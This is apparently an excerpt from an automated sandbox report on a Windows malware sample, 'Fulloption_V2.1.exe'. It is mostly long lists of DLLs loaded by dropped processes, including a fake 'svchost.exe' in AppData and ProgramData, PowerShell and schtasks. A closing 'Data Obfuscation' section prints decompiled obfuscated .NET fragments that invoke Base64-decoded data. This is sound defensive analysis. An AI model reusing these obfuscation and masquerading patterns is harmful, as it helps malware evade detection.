                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: d3dcompiler_43.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: d3dx11_43.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: mscoree.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: apphelp.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: mscoree.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Fulloption_V2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Fulloption_V2.1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: Fulloption_V2.1.exeStatic file information: File size 4400640 > 1048576
                        Source: Fulloption_V2.1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3f6200
                        Source: Fulloption_V2.1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: Bet\SBAGGY2\SBAGGY\examples\example_win32_directx11\Build\example_win32_directx11.pdb source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.dr

                        Data Obfuscation

                        barindex
                        Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
